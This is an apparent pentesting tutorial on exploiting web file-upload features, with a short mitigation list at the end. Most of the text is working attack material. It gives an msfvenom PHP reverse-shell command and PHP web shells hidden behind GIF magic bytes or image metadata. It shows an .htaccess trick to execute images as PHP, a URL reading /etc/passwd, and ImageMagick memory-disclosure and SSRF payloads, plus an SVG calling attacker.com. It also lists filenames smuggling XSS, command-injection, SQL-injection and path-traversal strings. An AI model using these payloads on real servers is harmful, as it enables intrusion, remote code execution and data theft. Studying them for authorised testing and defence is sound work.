File upload vulnerability is a noteworthy issue with online applications. If a web application has this type of vulnerability, an aggressor can upload a file with malicious code in it that can be executed on the server. An assailant may most likely put a phishing page into the site or mutilate it to uncover internal data of the web server to other people.
Allowing file uploads by end-users, especially if done without a full understanding of the risks associated with it, is akin to opening the floodgates for server compromise. Naturally, despite the security concerns surrounding the ability for end-users to upload files, it is an increasingly common requirement in modern web applications.
File uploads carry a significant risk that not many are aware of, or how to mitigate against abuses. Worst still, several web applications contain insecure, unrestricted file upload mechanisms.
Make sure you read "First Link in the Reference!!" its a great blog then proceed further.
What extension can lead to what if uploaded successfully:
Extensions Impact
ASP, ASPX, PHP5, PHP, PHP3: Webshell, RCE
SVG: Stored XSS, SSRF, XXE
GIF: Stored XSS, SSRF
CSV: CSV injection
XML: XXE
AVI: LFI, SSRF
HTML, JS : HTML injection, XSS, Open redirect
PNG, JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI, DoS
PDF, PPTX: SSRF, BLIND XXE
SCF : RCE
Types of Validation in File-Upload:
There several others too but this are the main 5 types others are like File Signature Validation,File Content Validation, File Storage Location which all comes in further protection.
1. Client-Side Validation:
Client side validation is a type of validation which takes place before the inputs are actually sent to the server. And it happens on the web browser by JavaScript, VBScript, or HTML5 attributes. Programmers use this type of validation to provide better user experience by responding quickly at the browser level.
For Example Error only .jpg is allowed
2. File Name Validation:
File name validation is when the server validate the file that being uploaded by checking its extension, this validation happens based on many methods, but two of the most popular methods are Blacklisting File Extensions and Whitelisting File Extensions.
Blacklisting File extensions is a type of protection where only a specific extensions are being rejected from the server, Such as php, aspx. While Whitelisting File extensions is the exact opposite, which is only a few file extensions are allowed to be uploaded to the server, Such as jpg, jpeg, gif.
3. Content-type / MIME-type Validation:
Content-Type validation is when the server validate the content of the file by checking the MIME type of the file, which can be shown in the http request. For example, some image file uploads validate the images uploaded by checking if the Content-Type of the file is an image type.
For Example: Content-type: image/png
4. Content-Length Validation:
Content-Length validation is when the server checks the length of the content of the uploaded file and restricts a file size that can’t be exceeded, Although this type of validation is not very popular, But it can be shown on some file uploads.
For Example: Not allow file size greater than 10 bytes
5. Checking the Image Header:
When image upload only is allowed, most web applications usually validate the image header by using a server-side function such as getimagesize() in PHP. When called, this function will return the size of an image. If the file is not a valid image, meaning that the file header is not that of an image, the function will return FALSE. Therefore, several web applications typically check if the function returns TRUE or FALSE and validate the uploaded file using this information.
1. Browse the site and find each upload functionality.2. Start with basic test by simply uploading a web shell using Weevely`weevely generate <password> <path>` OR Use Msfvenom `msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.10.8 lport=4444 -f raw`3. Try the extension bypasses if that fails4. Try changing content-type to bypass5. Try Magic number bypass 6. Try Polygot or PNG IDAT chunks bypass7. Finally if successful then upload small POC or exploit further.
Test Case - 1: Blacklisting Bypass.
1. Find the upload request and send it to the repeater2. Now start testing which extension for the file is blacklisted, change the `filename=` ParameterPOST /images/upload/ HTTP/1.1Host: target.com[...]---------------------------829348923824Content-Disposition: form-data; name="uploaded"; filename="dapos.php"Content-Type: application/x-php3. Try all of this extension **PHP** → .phtm, phtml, .phps, .pht, .php2, .php3, .php4, .php5, .shtml, .phar, .pgif, .inc**ASP** → asp, .aspx, .cer, .asa**Jsp** → .jsp, .jspx, .jsw, .jsv, .jspf**Coldfusion** → .cfm, .cfml, .cfc, .dbm**Using random capitalization** → .pHp, .pHP5, .PhArFind more in PayloadAllThings and https://book.hacktricks.xyz/pentesting-web/file-upload4. If successful then exploit further, or there might be other type of validation or check so try other bypass.
Test Case - 2: Whitelisting Bypass
1. Find the upload request and send it to the repeater2. Now start testing which extension for the file is whitelisted, change the `filename=` ParameterPOST /images/upload/ HTTP/1.1Host: target.com[...]---------------------------829348923824Content-Disposition: form-data; name="uploaded"; filename="dapos.jpg"Content-Type: application/x-php3. Try all of this extension file.jpg.phpfile.php.jpgfile.php.blah123jpgfile.php%00.jpgfile.php\x00.jpg this can be done while uploading the file too, name it file.phpD.jpg and change the D (44) in hex to 00.
file.php%00file.php%20file.php%0d%0a.jpgfile.php.....file.php/file.php.\file.php#.pngfile..html4. If doesn't works then try to bruteforce using intruder which extension are accepted and try again5. If successful then exploit further, or there might be other type of validation or check so try other bypass.
Test Case - 3: Content-type validation
1. Find the upload request and send it to the repeater2. Upload file.php and change the Content-type: application/x-php or Content-Type : application/octet-stream to Content-type: image/png or Content-type: image/gif or Content-type: image/jpg
POST /images/upload/ HTTP/1.1Host: target.com[...]---------------------------829348923824Content-Disposition: form-data; name="uploaded"; filename="dapos.php"Content-Type: application/x-php3. If successful then exploit further, or there might be other type of validation or check so try other bypass.
Test Case - 4: Content-Length validation
1. Find the upload request and send it to the repeater2. Try all three above bypass first, if they doesn't works then see if file size is been checked. Try all four of this case in combo for more success rate.POST /images/upload/ HTTP/1.1Host: target.com[...]---------------------------829348923824Content-Disposition: form-data; name="uploaded"; filename="dapos.php"Content-Type: application/x-php[...]3. Try small file payload like <?=`$_GET[x]`?> <?=‘ls’; Note : <? work for “short_open_tag=On” in php.ini ( Default=On )4. Finally the request should look like this. if this worked then try to access this file For Example: http://example.com/compromised_file.php?x=cat%20%2Fetc%2Fpasswd POST /images/upload/ HTTP/1.1Host: target.com[...]---------------------------829348923824Content-Disposition: form-data; name="uploaded"; filename="dapos.php"Content-Type: application/x-php<?=`$_GET[x]`?>5. Dont stop here, upload better shell and try to see if you can find something more critical like DB_.
Test Case - 5: Content Bypass / Using Magic Bytes
1. Find the upload request and send it to the repeater2. Try all Four above bypass first, if they doesn't works then see if file content is been checked. Try all five of this case in combo for more success rate.POST /images/upload/ HTTP/1.1Host: target.com[...]---------------------------829348923824Content-Disposition: form-data; name="uploaded"; filename="dapos.php"Content-Type: application/x-php[...]3. Change the Content-Type: application/x-php to Content-Type: image/gif and Add the text "GIF89a;" before you shell-code.POST /images/upload/ HTTP/1.1Host: target.com[...]---------------------------829348923824Content-Disposition: form-data; name="uploaded"; filename="dapos.php"Content-Type: image/gifGIF89a; <?php system($_GET['cmd']); ?>4. Try more from here https://en.wikipedia.org/wiki/List_of_file_signatures and change Content-Type: accordingly5. If successful upload better Shell and POC, and see how can you increase critically.
Test Case - 6: Magic Bytes and Metadata Shell
1. Find the upload request and send it to the repeater2. Try all above bypass first, if they doesn't works then see if file content is been checked. Try all six of this case in combo for more success rate.POST /images/upload/ HTTP/1.1Host: target.com[...]---------------------------829348923824Content-Disposition: form-data; name="uploaded"; filename="dapos.php"Content-Type: application/x-php[...]4. First Bypass Content-Type checks by setting the value of the Content-Type header to: image/png , text/plain , application/octet-stream5. Introduce the shell inside the metadata using tool exiftool.exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg6. Now try uploading this modified img.jpg7. Exploit further to increase critically.
Test Case - 7: Uploading Configuration Files
1. Find the upload request and send it to the repeater2. Now try to upload .htaccess file if the app is using php server or else try to upload .config is app is using ASP server3. If you can upload a .htaccess, then you can configure several things and even execute code (configuring that files with extension .htaccess can be executed). Different .htaccess shells can be found here: https://github.com/wireghoul/htshells OR If you can upload .config files and use them to execute code. One way to do it is appending the code at the end of the file inside an HTML comment: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config
More information and techniques to exploit this vulnerability here: https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/
4. Try to exploit now that server config is changed upload the shell For example if you uploaded .htaccess file with AddType application/x-httpd-php .png in content this configuration would instruct the Apache HTTP Server to execute PNG images as though they were PHP scripts.5. Now simply upload our php shell file with extension .png 6. Done, try to exploit further.
Test Case - 8: Try Zip Slip Upload
1. Find the upload request and send it to the repeater2. Now check if .zip file is allowed to upload 3. If a site accepts .zip file, upload .php and compress it into .zip and upload it.4. Now visit, site.com/path?page=zip://path/file.zip%23rce.phpIf you also try this tool and info here: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Zip%20Slip
Test Case -9 : Try ImageMagick
Check Reference : https://hackerone.com/reports/302885 , https://medium.com/@kunal94/imagemagick-gif-coder-vulnerability-leads-to-memory-disclosure-hackerone-e9975a6a560e
1. Find the upload functionality like profile pic upload.2. Git clone https://github.com/neex/gifoeb in you system.3. Goto gifoeb directory and run this command../gifoeb gen 512x512 dump.gif This will create exploitable dump.gif file where 512x512 is pixel dimension and dump.gif is an gif file. You can also try to bypass some checks. a) ./gifoeb gen 1123x987 dump.jpg b) ./gifoeb gen 1123x987 dump.png c) ./gifoeb gen 1123x987 dump.bmp d) ./gifoeb gen 1123x987 dump.tiff e) ./gifoeb gen 1123x987 dump.tif (It will create the dump files with different extensions. Try with which site works)4. After creation of exploitable files, just upload in the profile settings. using modified Image files.5. Server will return different pixel files. Download this file.6. Save and recover the pixel files. for p in previews/*; do ./gifoeb recover $p | strings; done7. More details here https://github.com/neex/gifoeb########################### Another Different method #############################Reference : https://www.exploit-db.com/exploits/39767 , https://hackerone.com/reports/1350721. Find Upload functionality.2. Make a file with .mvg extension and add below code in it.push graphic-contextviewbox 0 0 640 480fill 'url(http://example.com/)'pop graphic-contextHere example.com can be your burp collab url or your site were you can receive HTTP request.3. Now use below command convert ssrf.mvg out.png4. Upload the image and see if you received http request.Find ready made and more payloads here: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Picture%20Image%20Magik
Exploitation:
XSS:
There are multiple ways to achieve XSS.1. Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"2. Upload using .gif fileGIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;3. Upload using .svg file
Using excel file you can acheive not only XXE, but other vulnerability too. https://medium.com/@rezaduty/security-issues-in-import-export-functionality-5d8e4b4e9ed3
### SSRF:
```markdown
1. Abusing the "Upload from URL", if this image is going to be saved in some public site,
you could also indicate a URL from [IPlogger](https://iplogger.org/invisible/) and steal information of every visitor.
2. SSRF Through .svg file.
<?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><image height="200" width="200" xlink:href="https://attacker.com/picture.jpg" /></svg>
Command Injection:
1. Set filename ; sleep 10;
LFI:
1. Set filename ../../etc/passwd/logo.png2. Set filename ../../../logo.png as it might changed the website logo.
SQL Injection:
1. Set filename 'sleep(10).jpg2. Set filename sleep(10)-- -.jpg
DOS:
1. Pixel flood attack using image, upload this image and Boom!!https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/file-upload/malicious-images/lottapixel.jpghttps://hackerone.com/reports/390#:~:text=By%20loading%20the%20'whole%20image,Photo%20Viewer%20on%20my%20computer.2. DoS with a large values name: 1234...99.png
SSTI:
Mitigation
File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:
Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-Type header, the X-Content-Type-Options: nosniff header, and also a Content-Disposition header that specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defense-in-depth, this can be implemented both within application code and in the web server’s configuration).
Reject attempts to upload archive formats such as ZIP.
